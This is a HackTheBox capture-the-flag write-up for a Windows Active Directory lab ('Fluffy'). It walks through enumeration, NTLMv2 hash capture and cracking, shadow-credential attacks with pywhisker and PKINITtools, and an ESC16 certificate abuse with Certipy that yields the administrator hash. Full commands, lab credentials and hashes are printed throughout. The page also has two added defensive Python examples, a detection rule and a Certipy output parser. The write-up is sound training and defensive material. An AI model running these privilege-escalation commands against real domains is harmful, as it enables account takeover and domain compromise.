HackTheBox · Lab
Easy · Windows · Active Directory

NOTES

ENUMERATION

NMAP


    ```shell
    PORT      STATE SERVICE
    53/tcp    open  domain
    88/tcp    open  kerberos-sec
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49681/tcp open  unknown
    49682/tcp open  unknown
    49689/tcp open  unknown
    49694/tcp open  unknown
    49705/tcp open  unknown
    49721/tcp open  unknown
    ```


SMB


    Share enumeration as `Guest` succeeded.


    As `j.fleischman` we have `READ/WRITE` access on the `IT` share.


    We also found interesting files, including a PDF hinting at which CVEs the server is vulnerable to. After some research we found a matching public exploit.




    After running the exploit, we captured an NTLMv2 hash with Responder.


    (screenshot: NTLMv2 hash captured with Responder; image not reproduced)


    Cracked with hashcat (password of `p.agila`):

    - prometheusx-303

ADCS


    ```shell
    ❯ nxc ldap $IP -u $USER -p $PASS -M adcs
    LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
    LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\p.agila:prometheusx-303 
    ADCS        10.10.11.69     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
    ADCS        10.10.11.69     389    DC01             Found PKI Enrollment Server: DC01.fluffy.htb
    ADCS        10.10.11.69     389    DC01             Found CN: fluffy-DC01-CA
    ```

    - fluffy-DC01-CA

BLOODHOUND


    Possible path (from BloodHound):


    (screenshot: BloodHound graph of the path; image not reproduced)

FOOTHOLD

ATTACK VECTOR USER LEVEL




    Since `p.agila` is a member of `SERVICE ACCOUNTS MANAGERS`, which has `GenericAll` over the `SERVICE ACCOUNTS` group, and `SERVICE ACCOUNTS` in turn has `GenericWrite` over `ca_svc`, `ldap_svc` and `winrm_svc`, we can follow this path.


    With `GenericAll` we can directly modify the group membership, so we add `p.agila` to `SERVICE ACCOUNTS`; after that we can perform a `Shadow Credential Attack` against any of the accounts mentioned above.


ADD `p.agila` to `SERVICE ACCOUNTS`


    ```shell
    net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
    ```


    Then we proceed with `pywhisker`, `gettgtpkinit` and `getnthash` to create the certificate, obtain a TGT and recover the NT hash. The first account I attacked was `winrm_svc`, simply because it has remote access rights, so we can try `evil-winrm`.


PYWHISKER


    ```shell
    ❯ pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action "add"
    [*] Searching for the target account
    [*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
    [*] Generating certificate
    [*] Certificate generated
    [*] Generating KeyCredential
    [*] KeyCredential generated with DeviceID: c51277de-6740-f0cf-e65b-2f26a48aac6b
    [*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
    [+] Updated the msDS-KeyCredentialLink attribute of the target object
    [*] Converting PEM -> PFX with cryptography: yHBfrZXx.pfx
    [+] PFX exportiert nach: yHBfrZXx.pfx
    [i] Passwort für PFX: hOuFC8p5rGy1HnPsnRvL
    [+] Saved PFX (#PKCS12) certificate & key at path: yHBfrZXx.pfx
    [*] Must be used with password: hOuFC8p5rGy1HnPsnRvL
    [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
    ```


GETTGTPKINIT


    ```shell
    ❯ gettgtpkinit.py -cert-pem yHBfrZXx_cert.pem -key-pem yHBfrZXx_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
    2025-08-01 23:49:17,595 minikerberos INFO     Loading certificate and key from file
    INFO:minikerberos:Loading certificate and key from file
    2025-08-01 23:49:17,603 minikerberos INFO     Requesting TGT
    INFO:minikerberos:Requesting TGT
    2025-08-01 23:49:18,671 minikerberos INFO     AS-REP encryption key (you might need this later):
    INFO:minikerberos:AS-REP encryption key (you might need this later):
    2025-08-01 23:49:18,671 minikerberos INFO     b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe
    INFO:minikerberos:b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe
    2025-08-01 23:49:18,679 minikerberos INFO     Saved TGT to file
    INFO:minikerberos:Saved TGT to file
    ```


EXPORT KRB5


    ```shell
    export KRB5CCNAME=winrm_svc.ccache
    ```


GETNTHASH with generated key


    ```shell
    ❯ getnthash.py -key b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe fluffy.htb/winrm_svc
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [*] Using TGT from cache
    [*] Requesting ticket to self with PAC
    Recovered NT Hash
    33bd09dcd697600edf6b3a7af4875767
    ```


EVIL-WINRM as `winrm_svc`


    ```shell
    evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
    ```
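As an added defensive counterpart to the chain above (group membership change followed by a shadow-credential write), not part of the original write-up: a small correlation detector over constructed Windows Security events 4728 and 5136. The event field names are a simplified, hypothetical collector format; the logic is what matters.

```python
"""
Detection for the foothold chain above: a principal is added to a group
(event 4728) and shortly afterwards writes msDS-KeyCredentialLink on another
account (event 5136, 'Value Added'). Added example, not from the write-up.
The events below are constructed; field names are a simplified, hypothetical
form of what a log collector would emit for these Windows Security events.
"""
from datetime import datetime

SAMPLE_EVENTS = [
    {"time": "2025-08-01T23:40:02", "id": 4728, "subject": "FLUFFY\\p.agila",
     "group": "SERVICE ACCOUNTS", "member": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"},
    {"time": "2025-08-01T23:47:10", "id": 5136, "subject": "FLUFFY\\p.agila",
     "object": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"time": "2025-08-01T23:56:30", "id": 5136, "subject": "FLUFFY\\p.agila",
     "object": "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    # Benign: a computer account writing its own key during device registration.
    {"time": "2025-08-01T23:58:00", "id": 5136, "subject": "FLUFFY\\WS01$",
     "object": "CN=WS01,CN=Computers,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    # Unrelated attribute change by the same user: must not alert.
    {"time": "2025-08-01T23:59:00", "id": 5136, "subject": "FLUFFY\\p.agila",
     "object": "CN=p.agila,CN=Users,DC=fluffy,DC=htb",
     "attribute": "description", "operation": "Value Added"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def is_self_write(event):
    """True when the subject modifies its own object (WS01$ -> CN=WS01,...),
    the normal device-registration case that should not alert."""
    name = event["subject"].split("\\")[-1].rstrip("$").lower()
    rdn = event["object"].split(",")[0].split("=", 1)[1].lower()
    return name == rdn


def key_credential_writes(events):
    """All msDS-KeyCredentialLink additions made to someone else's object."""
    return [e for e in events
            if e["id"] == 5136
            and e["attribute"].lower() == "msds-keycredentiallink"
            and e["operation"] == "Value Added"
            and not is_self_write(e)]


def correlate(events, window_minutes=30):
    """One alert per suspicious key-credential write; severity is 'high' when
    the same subject was added to a group within the preceding window."""
    group_adds = [e for e in events if e["id"] == 4728]
    alerts = []
    for w in key_credential_writes(events):
        prior = [a for a in group_adds
                 if a["subject"] == w["subject"]
                 and 0 <= (_ts(w) - _ts(a)).total_seconds() <= window_minutes * 60]
        alerts.append({"subject": w["subject"], "target": w["object"],
                       "severity": "high" if prior else "medium",
                       "group_added": prior[0]["group"] if prior else None})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

On the sample both service-account writes come back as `high` because the same subject joined `SERVICE ACCOUNTS` minutes earlier, while the computer's self-registration and the unrelated attribute change are ignored.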

PRIVILEGE ESCALATION

PRIVESC TO ADMIN


Same procedure as before, but this time we target `ca_svc`.


PYWHISKER


    ```shell
    ❯ pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "ca_svc" --action "add"
    [*] Searching for the target account
    [*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    [*] Generating certificate
    [*] Certificate generated
    [*] Generating KeyCredential
    [*] KeyCredential generated with DeviceID: afe4586a-4bea-9f52-6afa-f1c5c9712284
    [*] Updating the msDS-KeyCredentialLink attribute of ca_svc
    [+] Updated the msDS-KeyCredentialLink attribute of the target object
    [*] Converting PEM -> PFX with cryptography: uswoiVwj.pfx
    [+] PFX exportiert nach: uswoiVwj.pfx
    [i] Passwort für PFX: WxWYLP4GLl9WUElhY8FH
    [+] Saved PFX (#PKCS12) certificate & key at path: uswoiVwj.pfx
    [*] Must be used with password: WxWYLP4GLl9WUElhY8FH
    [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
    ```


GETTGTPKINIT


    ```shell
    ❯ gettgtpkinit.py -cert-pem uswoiVwj_cert.pem -key-pem uswoiVwj_priv.pem fluffy.htb/ca_svc ca_svc.ccache
    2025-08-01 23:56:42,265 minikerberos INFO     Loading certificate and key from file
    INFO:minikerberos:Loading certificate and key from file
    2025-08-01 23:56:42,273 minikerberos INFO     Requesting TGT
    INFO:minikerberos:Requesting TGT
    2025-08-01 23:56:51,724 minikerberos INFO     AS-REP encryption key (you might need this later):
    INFO:minikerberos:AS-REP encryption key (you might need this later):
    2025-08-01 23:56:51,724 minikerberos INFO     f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a
    INFO:minikerberos:f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a
    2025-08-01 23:56:51,731 minikerberos INFO     Saved TGT to file
    INFO:minikerberos:Saved TGT to file
    ```


EXPORT KRB5


    ```shell
    export KRB5CCNAME=ca_svc.ccache
    ```


GETNTHASH


    ```shell
    ❯ getnthash.py -key f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a fluffy.htb/ca_svc
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [*] Using TGT from cache
    [*] Requesting ticket to self with PAC
    Recovered NT Hash
    ca0f4f9e9eb8a092addf53bb03fc98c8
    ```


CERTIPY ENUM/VULN CHECK


    ```shell
    ❯ certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Finding certificate templates
    [*] Found 33 certificate templates
    [*] Finding certificate authorities
    [*] Found 1 certificate authority
    [*] Found 11 enabled certificate templates
    [*] Finding issuance policies
    [*] Found 14 issuance policies
    [*] Found 0 OIDs linked to templates
    [*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
    [!] Failed to connect to remote registry. Service should be starting now. Trying again...
    [*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
    [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
    [!] Error checking web enrollment: timed out
    [!] Use -debug to print a stacktrace
    [!] Error checking web enrollment: timed out
    [!] Use -debug to print a stacktrace
    [*] Enumeration output:
    Certificate Authorities
      0
        CA Name                             : fluffy-DC01-CA
        DNS Name                            : DC01.fluffy.htb
        Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
        Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
        Certificate Validity Start          : 2025-04-17 16:00:16+00:00
        Certificate Validity End            : 3024-04-17 16:11:16+00:00
        Web Enrollment
          HTTP
            Enabled                         : False
          HTTPS
            Enabled                         : False
        User Specified SAN                  : Disabled
        Request Disposition                 : Issue
        Enforce Encryption for Requests     : Enabled
        Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
        Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
        Permissions
          Owner                             : FLUFFY.HTB\Administrators
          Access Rights
            ManageCa                        : FLUFFY.HTB\Domain Admins
                                              FLUFFY.HTB\Enterprise Admins
                                              FLUFFY.HTB\Administrators
            ManageCertificates              : FLUFFY.HTB\Domain Admins
                                              FLUFFY.HTB\Enterprise Admins
                                              FLUFFY.HTB\Administrators
            Enroll                          : FLUFFY.HTB\Cert Publishers
        [!] Vulnerabilities
          ESC16                             : Security Extension is disabled.
        [*] Remarks
          ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
    Certificate Templates                   : [!] Could not find any certificate templates
    ```


    This stands out!


    ```shell
    [!] Vulnerabilities
          ESC16                             : Security Extension is disabled.
    ```
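Added example, not from the write-up or from Certipy itself: a parser for the CA section of the `find -stdout` output shown above that flags the ESC16 condition (and the ESC6/ESC8 CA settings printed alongside it), using a trimmed copy of the page's own output as input.

```python
"""
Parser for the 'Certificate Authorities' section of Certipy's 'find -stdout'
output, turning the indented 'Key : Value' tree into a dict and flagging
CA-level misconfigurations. Added example, not from the write-up or Certipy.
SAMPLE_OUTPUT is a trimmed copy of the CA block printed above.
"""

SAMPLE_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
"""

# szOID_NTDS_CA_SECURITY_EXT: the extension that embeds the requester's SID.
# With it disabled the CA issues SID-less certificates and the KDC can only
# map them by UPN/DNS name, which is the ESC16 condition found above.
SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"


def parse_ca_block(text):
    """Flatten the indented tree: 'Enabled' under 'Web Enrollment' > 'HTTP'
    is stored as 'Certificate Authorities.0.Web Enrollment.HTTP.Enabled'."""
    fields, stack = {}, []          # stack of (indent, header) pairs
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip())
        while stack and stack[-1][0] >= indent:   # leave deeper/sibling headers
            stack.pop()
        if " : " in raw:
            key, value = (p.strip() for p in raw.split(" : ", 1))
            fields[".".join([h for _, h in stack] + [key])] = value
        else:
            stack.append((indent, raw.strip()))
    return fields


def get(fields, suffix):
    """Look a setting up by its path suffix, e.g. 'Web Enrollment.HTTP.Enabled'."""
    for key, value in fields.items():
        if key == suffix or key.endswith("." + suffix):
            return value
    return None


def assess_ca(fields):
    """Map CA settings to the Certipy ESC classes a defender should fix."""
    findings = []
    disabled = [o.strip() for o in (get(fields, "Disabled Extensions") or "").split(",")]
    if SID_EXTENSION_OID in disabled:
        findings.append("ESC16: SID security extension disabled; re-enable it "
                        "(remove the OID from the CA's DisableExtensionList)")
    if (get(fields, "User Specified SAN") or "").lower() == "enabled":
        findings.append("ESC6: requester-controlled SAN is allowed on this CA")
    if (get(fields, "Web Enrollment.HTTP.Enabled") or "").lower() == "true":
        findings.append("ESC8: HTTP web enrollment is enabled (relayable)")
    return findings


if __name__ == "__main__":
    for finding in assess_ca(parse_ca_block(SAMPLE_OUTPUT)):
        print(finding)
```

For the CA on this page the only finding is ESC16; with the OID removed from `Disabled Extensions` the same output produces no findings.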


Read the initial UPN of the victim account


    ```shell
    ❯ certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Reading attributes for 'ca_svc':
        cn                                  : certificate authority service
        distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
        name                                : certificate authority service
        objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
        sAMAccountName                      : ca_svc
        servicePrincipalName                : ADCS/ca.fluffy.htb
        userPrincipalName                   : ca_svc@fluffy.htb
        userAccountControl                  : 66048
        whenCreated                         : 2025-04-17T16:07:50+00:00
        whenChanged                         : 2025-08-01T21:56:52+00:00
    ```


Let's update the victim account's UPN to the target administrator's sAMAccountName


    ```shell
    ❯ certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes ':33bd09dcd697600edf6b3a7af4875767' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Updating user 'ca_svc':
        userPrincipalName                   : administrator
    [*] Successfully updated 'ca_svc'
    ```


Request a certificate as the “victim” user from any suitable client authentication template (e.g., “User”) on the ESC16-vulnerable CA


    ```shell
    ❯ certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
    [*] Requesting certificate via RPC
    [*] Request ID is 15
    [*] Successfully requested certificate
    [*] Got certificate with UPN 'administrator'
    [*] Certificate has no object SID
    [*] Try using -sid to set the object SID or see the wiki for more details
    [*] Saving certificate and private key to 'administrator.pfx'
    [*] Wrote certificate and private key to 'administrator.pfx'
    ```


Revert the “victim” account’s UPN


    ```shell
    ❯ certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes ':33bd09dcd697600edf6b3a7af4875767' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Updating user 'ca_svc':
        userPrincipalName                   : ca_svc@fluffy.htb
    [*] Successfully updated 'ca_svc'
    ```


Let’s authenticate as `administrator`


```shell
❯ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```

SYSTEM OWNAGE

(screenshot of the proof; image not reproduced)

CLEANUP

Nothing to clean


SCOPE

| IP | HOSTNAME | DOMAIN NAME | OS |
|---|---|---|---|
| 10.10.11.69 | DC01 | fluffy.htb | Win10/Srv19 B:17763 x64 |

WEB SERVICE TECHNOLOGY

WEB

No web service

NIKTO

WFUZZ / GOBUSTER

FILES

DIRS

SUBDIRS

VHOSTS

USERS

```shell
Administrator
Guest
krbtgt
ca_svc
ldap_svc
p.agila
winrm_svc
j.coffey
j.fleischman
```

CREDENTIALS

```shell
j.fleischman:J0elTHEM4n1990!
p.agila:prometheusx-303
```


SMB SHARES

```shell
Shares           
-----           
ADMIN$          
C$              
IPC$            
IT              
NETLOGON        
SYSVOL
```

OTHER NOTES

```shell
ADCS, Kerberos, Pywhisker, gettgtpkinit
```

LOGS

fluffy.fullnmap (full nmap scan log; attachment not reproduced)

0xNRG